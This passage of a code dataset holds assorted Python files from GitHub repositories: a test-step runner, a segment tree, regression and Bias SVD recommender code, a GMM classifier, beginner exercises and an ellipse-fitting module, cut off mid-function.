transactions):\r\n covered_transactions = self.get_covered_transaction_set(transactions)\r\n if len(covered_transactions) == len(transactions):\r\n return True\r\n return False","repo_name":"derekblasko/blockchain-messenger","sub_path":"blockchain_messenger/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18941961312","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nFileName: testscript.py\nAuthor: jiaminbit@sina.com\nCreate date: 2017.6.20\ndescription: 测试脚本,将各测试项的函数定义在该文件中\nUpdate date:2017.7.20\nversion 1.0.0\n\"\"\"\n\nimport time\nimport log\nimport zmq\nimport threading\nimport visionscript\nimport globaldata\nfrom tcpclient import *\n\n\nclass TestFunc():\n def __init__(self):\n try:\n self.vision = visionscript.Vision()\n self.done = False\n self.tcp1 = TcpClient()\n self.tcp2 = TcpClient()\n self.tcp1.tcp_connect('172.11.0.55', 4000)\n self.tcp1.tcp_send('tcp1')\n self.main_thread()\n except Exception as e:\n log.loginfo.process_log('testscript1 init:' + str(e))\n\n def __del__(self):\n self.zmq_close()\n\n def run_step(self, step):\n self.done = False\n globaldata.singnal.runsingnal[1].emit([1, 'Start'+step])\n\n def main_thread(self):\n self.recv_thread = threading.Thread(target=self.tcp_recv)\n self.recv_thread.setDaemon(True)\n self.recv_thread.start()\n\n 
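`last_block_hash_valid` in the blockchain record compares the hash of the current tip's payload against the `last_hash` carried by the incoming block. `blockchain_utils.hash` itself is not shown in this record; the following is a hedged stand-in using hashlib that illustrates the same linkage check:

import hashlib
import json

def payload_hash(payload: dict) -> str:
    # Hypothetical stand-in for blockchain_utils.hash(...).hexdigest():
    # serialize deterministically, then hash.
    data = json.dumps(payload, sort_keys=True).encode("utf-8")
    return hashlib.sha256(data).hexdigest()

def last_hash_valid(prev_payload: dict, incoming_last_hash: str) -> bool:
    # The incoming block is valid only if it points at the current chain tip.
    return payload_hash(prev_payload) == incoming_last_hash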
def tcp_recv(self):\n time.sleep(5)\n self.sequence()\n while(True):\n ret = self.tcp1.tcp_recv()\n if(ret!=''):\n self.run_step(ret)\n\n def sequence(self):\n self.run_step('prerun')\n while(self.done==False):\n time.sleep(0.1)\n self.run_step('function1')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function2')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function3')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function4')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function5')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function6')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function7')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function8')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function9')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('postrun')\n while (self.done == False):\n time.sleep(0.1)\n\n def zmq_open(self):\n self.con = zmq.Context()\n self.socket = self.con.socket(zmq.REQ)\n # 接收超时2秒,发送超时1秒\n self.socket.RCVTIMEO = 2000\n self.socket.SNDTIMEO = 1000\n try:\n self.socket.connect('tcp://127.0.0.1:5555')\n except Exception as e:\n log.loginfo.process_log(str(e))\n\n def zmq_comm(self, msg):\n try:\n # 发送数据\n snd = self.socket.send_string('Start' + msg)\n # 接收数据\n ret = self.socket.recv_string()\n return ret\n except Exception as e:\n log.loginfo.process_log(str(e))\n return ''\n\n def zmq_close(self):\n self.socket.close()\n\n def prerun(self):\n time.sleep(1)\n ret = [0, 'pretest']\n self.done = True\n return ret\n\n def function1(self):\n self.vision.read_image()\n ret = [0, 0, 0, 'step1']\n self.done = True\n return ret\n\n def function2(self):\n time.sleep(1)\n ret = [0, 'step2']\n self.done = True\n return ret\n\n def function3(self):\n time.sleep(1)\n ret = [0, 'step3']\n self.done = True\n return ret\n\n def function4(self):\n time.sleep(0.1)\n ret = [0, 'step4']\n self.done = True\n return ret\n\n def function5(self):\n time.sleep(1)\n ret = [0, 'step5']\n self.done = True\n return ret\n\n def function6(self):\n time.sleep(0.1)\n ret = [0, 'step6']\n self.done = True\n return ret\n\n def function7(self):\n time.sleep(1)\n ret = [0, 'step7']\n self.done = True\n return ret\n\n def function8(self):\n time.sleep(0.1)\n ret = [0, 'step8']\n self.done = True\n return ret\n\n def function9(self):\n time.sleep(0.1)\n ret = [0, 'step9']\n self.done = True\n return ret\n\n def function10(self):\n time.sleep(0.1)\n ret = [0, 'step10']\n self.done = True\n return ret\n\n def postrun(self):\n time.sleep(0.1)\n ret = [0, 'posttest']\n self.done = True\n return ret","repo_name":"bitjiamin/PlatForm","sub_path":"Scripts/testscript2.py","file_name":"testscript2.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618067783","text":"import sys\r\n\r\nN, Q = map(int, input().split())\r\n\r\ntree = [0] * ((N + 1) * 4)\r\n\r\ndef update(start, end, node, value, target):\r\n if target < start or target > end:\r\n return\r\n tree[node] += value\r\n if start == end:\r\n return \r\n mid = (start + end) // 2\r\n update(start, mid, node * 2, value, target)\r\n update(mid + 1, end, node * 2 + 1, value, target)\r\n\r\ndef find(start, end, node, fl, fr):\r\n if fr < start or fl > end:\r\n return 0\r\n if fl <= start and fr >= end:\r\n return tree[node]\r\n mid = (start + end) // 2\r\n return find(start, mid, 
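The `sequence` method in the test-script record repeats the same run-then-poll block once per step. Since `run_step` already takes the step name as a string, the whole sequence collapses to a loop over step names; a sketch with identical behaviour, assuming the same `self.done` flag and `run_step` method:

import time

def sequence(self):
    # Run each step, then poll self.done until its handler signals completion.
    steps = ["prerun"] + [f"function{i}" for i in range(1, 10)] + ["postrun"]
    for step in steps:
        self.run_step(step)
        while not self.done:
            time.sleep(0.1)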
node * 2, fl, fr) + find(mid + 1, end, node * 2 + 1, fl, fr)\r\n\r\nfor _ in range(Q):\r\n q = list(map(int, sys.stdin.readline().split()))\r\n if q[0] == 1:\r\n update(0, N, 1, q[2], q[1])\r\n else:\r\n print(find(0, N, 1, q[1], q[2]))","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/12837. 가계부 (Hard)/가계부 (Hard).py","file_name":"가계부 (Hard).py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25565661293","text":"from lost_ark import AucParser\n\n\ndef main():\n auc_parser = AucParser(tesseract_cmd=r'I:\\Tesseract-OCR\\tesseract')\n auc_parser.parse_auc_screenshots_folder(\n folder=r'latest screenshots', \n extension=r'jpg', \n output_folder=r'json dumps'\n )\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Ampiduxmoe/price-collector","sub_path":"price_collector.py","file_name":"price_collector.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15041205757","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\n\ndef print_zip(x, y):\n for n, m in zip(x, y):\n print(n, m)\n\n\na = np.loadtxt('../data/project4/dane2.txt')\n\nx_all = a[:, [1]]\ny_all = a[:, [0]]\n\nx, x_test, y, y_test = train_test_split(x_all, y_all, test_size=0.5, random_state=3)\n\nc = np.hstack([x, np.ones(x.shape)])\nc3 = np.hstack([np.cbrt(x), np.ones(x.shape)])\n\nv = np.linalg.pinv(c) @ y\nv3 = np.linalg.pinv(c3) @ y\n\ne = sum((y - (v[0] * x + v[1])) ** 2)/len(y)\ne3 = sum((y - (v3[0] * np.cbrt(x) + v3[1])) ** 2)/len(y)\n\ne_test = sum((y_test - (v[0] * x_test + v[1])) ** 2)/len(y_test)\ne3_test = sum((y_test - (v3[0] * np.cbrt(x_test) + v3[1])) ** 2)/len(y_test)\n\nprint('TRAINING SET ERROR:', 'linear -', e, 'cubic root -', e3)\nprint('TESTING SET ERROR:', 'linear -', e_test, 'cubic root -', e3_test)\n\nplt.plot(x, y, 'ro')\nx = sorted(x)\nplt.plot(x, v[0] * x + v[1])\nplt.plot(x, v3[0] * np.cbrt(x) + v3[1])\nplt.show()\n\nplt.plot(x_test, y_test, 'ro')\nx_test = sorted(x_test)\nplt.plot(x_test, v[0] * x_test + v[1])\nplt.plot(x_test, v3[0] * np.cbrt(x_test) + v3[1])\nplt.show()\n","repo_name":"OleksandrBieliakov/miw","sub_path":"project4/myRegression.py","file_name":"myRegression.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43064119521","text":"#!/usr/bin/python\n#coding=utf-8\n'''\n Module:The Bias SVD Algorithm implementation using numpy\n Author: Timmy Qiao\n Date: Jun 11 2019\n The main procedures include:\n\n'''\nimport numpy as np\nimport time\nimport pandas as pd\nimport pickle\n\nclass BiasSVD(object):\n '''\n Implementation of the BiasSVD approach\n '''\n def __init__(self):\n pass\n\n def __init__(self,epochs,lr,K,Lambda,saveModel=False,ckptStep=10):\n '''\n :param epochs: the max training epoches\n :param lr: learning rate\n :param K: the latent vector dimension\n :param Lambda: the regularized coefficient\n '''\n super(BiasSVD, self).__init__()\n self.epochs = epochs\n self.lr = lr\n self.K = K\n self.Lambda = Lambda\n self.usersDict = {}\n self.itemsDict = {}\n self.saveModel = saveModel\n self.ckptStep = ckptStep\n\n def fit(self,trainData,valData=None):\n rateNums = trainData.shape[0]\n train_df = pd.DataFrame(trainData) # convert the narray object to DataFrame object\n userIds = 
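The recursive segment tree in the BOJ record supports point updates and range-sum queries in O(log N). A Fenwick tree (binary indexed tree) gives the same two operations with less code and no recursion; a sketch using 1-based indices:

class Fenwick:
    # Point update / prefix sum in O(log n), 1-based indexing.
    def __init__(self, n):
        self.n = n
        self.t = [0] * (n + 1)

    def update(self, i, delta):
        while i <= self.n:
            self.t[i] += delta
            i += i & -i  # jump to the next index this node covers

    def prefix(self, i):
        s = 0
        while i > 0:
            s += self.t[i]
            i -= i & -i
        return s

    def range_sum(self, l, r):
        return self.prefix(r) - self.prefix(l - 1)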
np.array(train_df[0].value_counts().keys())\n itemIds = np.array(train_df[1].value_counts().keys())\n userIds = np.sort(userIds)\n itemIds = np.sort(itemIds)\n for index,id in enumerate(userIds):\n self.usersDict[id] = index\n for index,id in enumerate(itemIds):\n self.itemsDict[id] = index\n\n userNum = len(userIds)\n itemNum = len(itemIds)\n self.meanV = 1.0 * np.sum(trainData[:,2]) / rateNums\n initV = np.sqrt(self.meanV / self.K)\n self.Pu = initV + np.random.uniform(-0.01,0.01,(userNum,self.K))\n self.Qi = initV + np.random.uniform(-0.01,0.01,(itemNum,self.K))\n self.Bu = np.random.rand(userNum) / (self.K ** 0.5)\n self.Bi = np.random.rand(itemNum) / (self.K ** 0.5)\n\n for i in range(self.epochs):\n epochTime = time.time()\n sumRmse = 0.0\n # Using the SGD approach to optimize the loss function\n # We need to permute the training orders of the same training data\n train_permute_indices = np.random.permutation(trainData.shape[0])\n curStep = 0\n for index in train_permute_indices:\n userId = trainData[index][0]\n itemId = trainData[index][1]\n userIndex = self.usersDict[userId]\n itemIndex = self.itemsDict[itemId]\n rating = trainData[index][2] * 1.0\n # The Estimation of R(u,i) can be represented as:\n # R(u,i) = meanV + Bu[u] + Bi[i] + Pu[u]^T * Qi[i]\n Rui = self.meanV + self.Bu[userIndex] + self.Bi[itemIndex] + \\\n self.Pu[userIndex].dot(self.Qi[itemIndex])\n error = rating - Rui\n sumRmse += error ** 2\n p,q = self.Pu[userIndex], self.Qi[itemIndex]\n # Update the parameters using SGD approach\n self.Bu[userIndex] += self.lr * (error - self.Lambda * self.Bu[userIndex])\n self.Bi[itemIndex] += self.lr * (error - self.Lambda * self.Bi[itemIndex])\n self.Pu[userIndex] += self.lr * (error * q - self.Lambda * p)\n self.Qi[itemIndex] += self.lr * (error * p - self.Lambda * q)\n curStep += 1\n stepTime = time.time()\n if curStep % 100000 == 0:\n print(\"Epoch %d Step %d cost time %.4f ms, train avg RMSE: %.4f\" \\\n %(i+1,curStep,1000*(time.time() - stepTime),np.sqrt(sumRmse * 1.0 / curStep)))\n\n epochRmse = np.sqrt(sumRmse * 1.0 / rateNums)\n\n if valData.any():\n _,valRmse = self.evaluate(valData)\n print(\"Epoch %d cost time %.4fs, train RMSE: %.4f, validation RMSE: %.4f\" \\\n %(i+1,(time.time()-epochTime),epochRmse,valRmse))\n\n if self.saveModel and (i + 1) % self.ckptStep == 0:\n model = (self.usersDict, self.itemsDict, self.meanV, self.Bu, self.Bi, self.Pu, self.Qi)\n model_name = 'ckpt_' + str(i + 1) + '.pkl'\n model_path = 'save_model/' + model_name\n with open(model_path, 'wb') as fi:\n pickle.dump(model, fi)\n\n return (self.usersDict, self.itemsDict, self.meanV, self.Bu, self.Bi, self.Pu, self.Qi)\n\n def evaluate(self,val):\n print('Validating the validation dataset now...')\n loss = 0.0\n preds = []\n for i in range(val.shape[0]):\n sample = val[i]\n userId = sample[0]\n itemId = sample[1]\n if userId in self.usersDict \\\n and itemId in self.itemsDict:\n userIndex = self.usersDict[userId]\n itemIndex = self.itemsDict[itemId]\n pred = self.meanV + self.Bu[userIndex] + self.Bi[itemIndex] + \\\n self.Pu[userIndex].dot(self.Qi[itemIndex])\n if pred > 1.0:\n pred = 1.0\n elif pred < 0.0:\n pred = 0.0\n preds.append(pred)\n\n if val.shape[1] == 3:\n truth = sample[2] * 1.0\n loss += (pred - truth) ** 2\n\n if (i+1) % 100000 == 0:\n print('%d data have been validated...'%(i+1))\n print('Validating has been finised...')\n\n if val.shape[1] == 3:\n rmse = np.sqrt(loss / val.shape[0])\n return pred,rmse\n\n return pred\n\n def predict(self,testData):\n return 
self.evaluate(self,testData)\n\n def loadModel(self,file_path):\n with open(file_path,'rb') as fi:\n model = pickle.load(fi)\n self.usersDict = model[0]\n self.itemsDict = model[1]\n self.meanV = model[2]\n self.Bu = model[3]\n self.Bi = model[4]\n self.Pu = model[5]\n self.Qi = model[6]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"forevergogi/bias_svd_with_numpy","sub_path":"model/BiasSVD.py","file_name":"BiasSVD.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36974223043","text":"'''\n Author: Jon Ander Gomez Adrian (jon@dsic.upv.es, http://personales.upv.es/jon)\n Version: 2.0\n Date: January 2021\n Universitat Politecnica de Valencia\n Technical University of Valencia TU.VLC\n\n'''\nimport os\nimport sys\nimport numpy\n\nfrom sklearn.mixture import GaussianMixture\n\nclass GMM_classifier:\n \"\"\"\n According to the Bayes' rule:\n P(c) = A priori probability of classs c\n p(x|c) = Conditional probability density of observing the sample x when the state of the system corresponds to class c\n P(c|x) = P(c)*p(x|c) / p(x) -- A posteriori probability that the system is in state c when the sample x has been observed\n p(x) = Likelihood of sample x computed as the sumatory of all P(k)*p(x|k) for all the classes, not used here for classifying\n \"\"\"\n\n def __init__(self, n_components, covar_type = 'diag', max_iter = 100, n_init = 1, verbose = 0, use_prioris = True):\n self.n_components = n_components\n self.covar_type = covar_type\n self.max_iter = max_iter\n self.n_init = n_init\n self.verbose = verbose\n self.use_prioris = use_prioris\n #\n self._estimator_type = 'classifier'\n #\n self.num_classes = -1\n self.mixtures = None\n self.prioris = None\n\n def __str__(self):\n return f'GMM_classifier(n_components = {self.n_components}, covar_type = {self.covar_type}, use_prioris = {self.use_prioris})'\n \n def fit(self, X, y):\n num_classes = len(numpy.unique(y))\n if num_classes != self.num_classes:\n self.num_classes = num_classes\n self.mixtures = [GaussianMixture(n_components = min(self.n_components, max(1, sum(y == c) // 20)),\n covariance_type = self.covar_type,\n reg_covar = 1.0e-5,\n init_params = 'random',\n max_iter = self.max_iter,\n n_init = self.n_init,\n verbose = max(0, self.verbose - 1)) for c in range(self.num_classes)]\n #\n if self.use_prioris:\n self.log_prioris = numpy.array([numpy.log(sum(y == c)) for c in range(self.num_classes)]) - numpy.log(len(y))\n else:\n self.log_prioris = numpy.ones(self.num_classes) / self.num_classes\n #\n for c in range(self.num_classes):\n if self.verbose > 0:\n print(\" GMM for class %2d ... 
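The BiasSVD fit loop above implements the prediction R(u,i) = mu + b_u + b_i + p_u . q_i and its SGD updates inline. The same single update step, isolated as a worked example in plain numpy with the same L2 regularization pattern (note the old `pu` must feed the `qi` update and vice versa, as the original's `p, q` copies ensure):

import numpy as np

def sgd_step(mu, bu, bi, pu, qi, rating, lr, lam):
    # Predicted rating and residual for one (user, item, rating) triple.
    pred = mu + bu + bi + pu @ qi
    err = rating - pred
    # Each parameter moves to reduce the error, shrunk by the L2 term lam.
    bu += lr * (err - lam * bu)
    bi += lr * (err - lam * bi)
    pu_new = pu + lr * (err * qi - lam * pu)  # uses the pre-update qi
    qi_new = qi + lr * (err * pu - lam * qi)  # uses the pre-update pu
    return bu, bi, pu_new, qi_new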
\" % c)\n x_train = X[y == c]\n self.mixtures[c].fit(x_train)\n #\n return self\n\n\n def log_densities(self, X):\n log_densities = numpy.zeros([len(X), self.num_classes])\n for c in range(self.num_classes):\n log_densities[:,c] = self.mixtures[c].score_samples(X)\n return log_densities\n\n def log_proba(self, X):\n post = self.posteriori(X)\n post = numpy.maximum(post, 1.0e-200)\n return numpy.log(post)\n\n def predict(self, X):\n return numpy.argmax(self.log_proba(X), axis = 1)\n\n def posteriori(self, X):\n log_proba = numpy.zeros([len(X), self.num_classes])\n for c in range(self.num_classes):\n log_proba[:,c] = self.log_prioris[c] + self.mixtures[c].score_samples(X)\n #\n _m_ = log_proba.max(axis = 1).reshape(-1, 1)\n log_proba -= _m_\n proba = numpy.exp(log_proba)\n _m_ = proba.sum(axis = 1).reshape(-1, 1)\n proba /= _m_\n #\n return proba\n\nif __name__ == '__main__':\n x1 = 10 + 3 * numpy.random.randn(1000, 17)\n y1 = numpy.zeros(1000)\n x2 = -6 + 8 * numpy.random.randn(1000, 17)\n y2 = numpy.ones(1000)\n x3 = 46 + 2 * numpy.random.randn(1000, 17)\n y3 = numpy.ones(1000) * 2\n x = numpy.vstack([x1, x2, x3])\n y = numpy.hstack([y1, y2, y3]).astype(numpy.int32)\n print(x.shape)\n print(y.shape)\n gmmc = GMM_classifier(n_components = 3, covar_type = 'full', verbose = 1)\n gmmc.fit(x, y)\n z1 = 10 + 3 * numpy.random.randn(1000, 17)\n z2 = -6 + 8 * numpy.random.randn(1000, 17)\n z3 = 46 + 2 * numpy.random.randn(1000, 17)\n y1 = gmmc.predict(z1)\n y2 = gmmc.predict(z2)\n y3 = gmmc.predict(z3)\n print(sum(y1 == 0) / len(y1))\n print(sum(y2 == 1) / len(y2))\n print(sum(y3 == 2) / len(y3))\n","repo_name":"jonandergomez/machine_learning_for_students","sub_path":"machine_learning/gmm_classifier.py","file_name":"gmm_classifier.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24557306723","text":"##1) Arithmetic operation\r\ndef add(a,b):\r\n return a+b\r\ndef sub(a,b):\r\n return a-b\r\ndef mul(a,b):\r\n return a*b\r\ndef div(a,b):\r\n return a/b\r\n\r\nprint(\"Enter the operator (+,-,/,*): \")\r\nch = input()\r\n\r\nif ch=='+':\r\n print(\"sum: \", add(2,5))\r\nelif ch=='-':\r\n print(\"substraction: \", sub(2,5))\r\nelif ch=='*':\r\n print(\"multiplication: \", mul(2,5))\r\nelif ch=='/':\r\n print(\"division: \", div(10,5))\r\nelse:\r\n print(\"Invalid operator\")\r\n\r\n\r\n##2) Binary sort\r\ndef binary_sort(a,val,first,last):\r\n if first==last:\r\n if a[first]>val:\r\n return first\r\n else:\r\n return first+1\r\n if first>last:\r\n return first\r\n mid = (first+last)//2\r\n if a[mid]< val:\r\n return binary_sort(a,val,mid+1,last)\r\n elif a[mid]> val:\r\n return binary_sort(a,val,first,mid-1)\r\n else:\r\n return mid\r\n\r\ndef sort(a):\r\n for i in range(1, len(a)):\r\n val = a[i]\r\n j = binary_sort(a, val, 0, i-1)\r\n a = a[:j] + [val] + a[j:i] + a[i + 1:]\r\n return a\r\n\r\nprint(\"Binary sorted array: \")\r\nprint(sort([10, 34, 2, 4, 6, 8, 32, 67]))\r\n\r\n\r\n#3)\r\ndef table(n):\r\n return lambda a:a*n\r\nn=2\r\nb=table(n)\r\nfor i in range (1,11):\r\n print(n,\"*\" ,i, \"=\" ,b(i))\r\n\r\n#4)\r\nnum = int(input(\"enter the number: \"))\r\nfactors=[]\r\nfor i in range(1, num+1):\r\n if num % i ==0:\r\n factors.append(i)\r\nprint(\"Factors of {} = {}\".format(num,factors))\r\n\r\n#5)\r\nimport math\r\nnum = float(input(\"Enter the number: \"))\r\nSquareroot = math.pow(num,0.5)\r\nprint(\"The square root of a given 
number{0}={1}\".format(num,Squareroot))\r\n\r\n#6)\r\nnum=int(input(\"Enter the number: \"))\r\n\r\nflag=False\r\n\r\nif num>1:\r\n for i in range(2, num):\r\n if(num % i) == 0:\r\n flag=True\r\n break\r\nif flag:\r\n print(num, \"is not a prime numbers\")\r\nelse:\r\n print(num, \"is a prime numbers\")\r\n","repo_name":"divyashreen-agi/python1","sub_path":"pythonasg.py","file_name":"pythonasg.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28703960711","text":"\"\"\"\nhttps://leetcode.com/problems/kth-missing-positive-number/\n\nSimple and Iterative approach.\n\"\"\"\n__author__ = \"Hwamin Kim\"\n__email__ = \"quicksort00@gmail.com\"\n__license__ = \"Apache-2.0\"\n__version__ = \"1.0.0\"\n\n\nclass Solution:\n def findKthPositive(self, arr: 'List[int]', k: int) -> int:\n \"\"\"\n The array is sorted, and we are only required to find k-th missing\n number. We can except the number of array which is smaller than k.\n\n ex)\n arr = [3, 7, 10] / k = 6\n number sequence: 1, 2, [3], 4, 5, 6, [7], 8, 9, [10]\n | | | | | |\n k: 1 2 3 4 5 6\n Therefore, answer is 8 (== k + len([3, 7]))\n \"\"\"\n for elem in arr:\n if k < elem:\n return k\n k += 1\n return k\n","repo_name":"hwaminkim/TIL","sub_path":"leetcode/1539_kth-missing-positive-number/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36186206309","text":"import time\nimport cv2\nimport numpy as np\nimport pandas as pd\n\nfrom helper import *\nfrom scipy.linalg import eig\nfrom dataclasses import dataclass\nfrom sklearn.cluster import OPTICS\nfrom skimage.morphology import skeletonize\n\n@dataclass\nclass params:\n center : tuple\n theta : float\n A : float\n B : float\n\nclass Ellipse_dlsq:\n def __init__(self) -> None:\n self.param_cluster = list()\n\n def __del__(self) -> None:\n pass\n\n def generalized_eigensystem(self, x : np.ndarray, y : np.ndarray) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Formulates the generalized eigensystem problem and solves it by decomposing the system to its eigen values \n and corresponding eigenvectors. The formulation is done using the design matrix which is in turn constructed\n using the input coordinate arrays (x,y)\n \"\"\"\n # Design Matrix\n D = np.array([x*x, x*y, y*y, x, y, np.ones((x.shape), dtype=\"int\")], dtype=\"float64\").T\n # Scatter Matrix\n S = D.T @ D \n # Constraint Matrix\n C = np.zeros(S.shape, dtype=\"float64\")\n C[0,2] = C[2,0] = -2; C[1,1] = 1\n # Generalized eigensystem\n eigvals, eigvecs = eig(S, C)\n eigvals, eigvecs = np.real(eigvals), np.real(eigvecs)\n return eigvals, eigvecs\n\n def set_data(self, points : np.ndarray) -> None:\n \"\"\"\n Sets the points list and separates the x, y coordinates into separate respective arrays. This is to\n solve the generalized eigensystem\n \"\"\"\n self.data_x = np.array(points[:,0])\n self.data_y = np.array(points[:,1])\n self.len = len(self.data_x)\n return;\n\n def filter_points(self, x : np.ndarray, y : np.ndarray, idx : int, eigvecs : np.ndarray) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Takes a detected ellipse, calculates the outliers of the ellipse and removes them. 
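The k-th-missing-positive solution above scans linearly in O(n + k). Because the array is sorted, `arr[i] - (i + 1)` counts how many positives are missing strictly before `arr[i]`, which admits an O(log n) binary search; a sketch:

def find_kth_positive(arr, k):
    # Find the first index whose "missing before" count reaches k.
    lo, hi = 0, len(arr)
    while lo < hi:
        mid = (lo + hi) // 2
        if arr[mid] - (mid + 1) < k:
            lo = mid + 1
        else:
            hi = mid
    # Exactly lo array values lie before the answer, so it is lo + k.
    return lo + k

# find_kth_positive([3, 7, 10], 6) == 8, matching the worked example above.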
This then\n gives us a cleaner set of points to estimate the ellipse better on the second attempt\n \"\"\"\n ellipse = self.calculate_ellipse_params(eigvecs[:,idx].flatten())\n dist_dict = dict()\n for (xi,yi) in zip(x,y):\n h,k = ellipse.center\n K1 = (xi - h)**2 / ellipse.A ** 2\n K2 = (yi - k)**2 / ellipse.B ** 2\n dist = K1 + K2 - 1\n dist_dict[dist] = (xi,yi)\n\n keys = list(sorted(dist_dict))\n keys = keys[0:int(0.8*len(keys))]\n x_new, y_new = list(), list()\n for key in keys:\n (xi,yi) = dist_dict[key]\n x_new.append(xi)\n y_new.append(yi)\n \n return np.array(x_new), np.array(y_new)\n\n def fit_ellipse(self, points_per_sample : int = 6, n_iter : int = 50) -> list:\n \"\"\"\n Fits ellipses on batches of points for a number of iterations, and refines the ellipse fitting based on \n the distances of the chosen points from the corresponding ellipse fit. This refinement is only to avoid\n any major effects of outlier points (point/s which don't lie on the same ellipse)\n \"\"\"\n n = 0\n cluster = list()\n while n < n_iter:\n x, y = list(), list()\n idx = np.random.permutation(self.len)\n for i in range(points_per_sample):\n x.append(self.data_x[idx[i]])\n y.append(self.data_y[idx[i]])\n \n try:\n x, y = np.array(x), np.array(y)\n eigvals, eigvecs = self.generalized_eigensystem(x, y)\n # Since the system is +ve semi definite, only 1 negative eigenvalue\n idx = np.where(eigvals < 0)[0]\n # Filter the points and estimate the ellipse again to get a better estimate\n x_new, y_new = self.filter_points(x, y, idx, eigvecs)\n eigvals, eigvecs = self.generalized_eigensystem(x_new, y_new)\n idx = np.where(eigvals < 0)[0]\n cluster.append(eigvecs[:,idx])\n\n except (ValueError, IndexError, np.linalg.LinAlgError) as e:\n print(str(e) + \" in the fit_ellipse() method\")\n\n n += 1\n\n self.param_cluster = np.array(cluster).reshape(-1,6)\n \n def cluster_eigenvecs(self) -> np.ndarray:\n \"\"\"\n Implements the OPTICS (Ordering Points To Identify Cluster Structure) clustering\n to cluster the 6D eigen vector space. 
The centroid of the largest cluster is taken\n as the ellipse to segregate the numbers.\n \"\"\"\n clusters = OPTICS(min_samples=10).fit_predict(self.param_cluster)\n cluster_data = pd.DataFrame(list(zip(self.param_cluster, clusters)), columns=['Params', 'Cluster_id'])\n max_cluster = cluster_data['Cluster_id'].value_counts()[:5].to_dict()\n for k,_ in max_cluster.items():\n if k != -1:\n mode = k\n \n df = cluster_data.loc[cluster_data['Cluster_id'] == mode]\n param_list = np.array(df['Params'].to_list()).reshape(-1,6)\n largest_cluster = list()\n for param in param_list:\n a, b, c, _, _, _ = param\n if b**2 - 4*a*c < 0:\n largest_cluster.append(param)\n\n return np.array(largest_cluster).reshape(-1,6)\n\n def calculate_ellipse_params(self, eigenvector : np.ndarray) -> params:\n \"\"\"\n Recognizes the ellipse from a list of general conic section equations \n and extracts computes the 5 required parameters namely center_x, center_y,\n semi major axis, semi minor axis and orientation\n \"\"\"\n a,b,c,d,e,f = eigenvector[0], eigenvector[1], eigenvector[2], eigenvector[3], eigenvector[4], eigenvector[5]\n det = 4*a*c - b*b\n if det > 0:\n try:\n E = math.sqrt(b**2 + (a-c)**2)\n F = b*d*e - a*(e**2) - c*(d**2)\n q = 64 * ((f*det + F) / (det**2))\n s = 0.25 * math.sqrt(abs(q)*E)\n A = 0.125 * math.sqrt(2*abs(q)*E - 2*q*(a+c))\n B = math.sqrt((A**2) - (s**2))\n \n x0 = (b*e - 2*c*d) / det\n y0 = (b*d - 2*a*e) / det\n\n Q1 = q*a - q*c\n Q2 = q*b\n tanbac = math.atan2(b, a-c)\n if Q1 == 0 and Q2 == 0:\n theta = 0\n elif Q1 == 0 and Q2 > 0:\n theta = np.pi/4\n elif Q1 == 0 and Q2 < 0:\n theta = 3 * np.pi/4\n elif Q1 > 0 and Q2 >= 0:\n theta = 0.5 * tanbac\n elif Q1 > 0 and Q2 < 0:\n theta = 0.5 * tanbac + np.pi\n elif Q1 < 0:\n theta = 0.5 * (tanbac + np.pi) \n\n return params((x0, y0), theta, A, B)\n\n except (ValueError, IndexError, np.linalg.LinAlgError) as e:\n print(str(e) + \" in calculate_ellipse_params() method\") \n return None\n\n else:\n print(\"WARNING :- Conic section is not an ellipse\")\n return None \n\n def visualize_ellipse(self, image : np.ndarray, ellipse : params) -> None:\n \"\"\"\n For visualization purposes only\n \"\"\"\n if ellipse is not None:\n center = (int(ellipse.center[0]), int(ellipse.center[1]))\n axes = (int(ellipse.A), int(ellipse.B))\n angle = int(math.degrees(ellipse.theta))\n cv2.ellipse(image, center, axes, angle, 0, 360, (0,255,0), 2)\n\n cv2.imshow(\"image\", image)\n cv2.waitKey(0)\n\ndef main():\n image = cv2.resize(cv2.imread(\"substation_images/ferguson_pressure_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/proflo_pressure_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/spot_ptz_breaker_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n 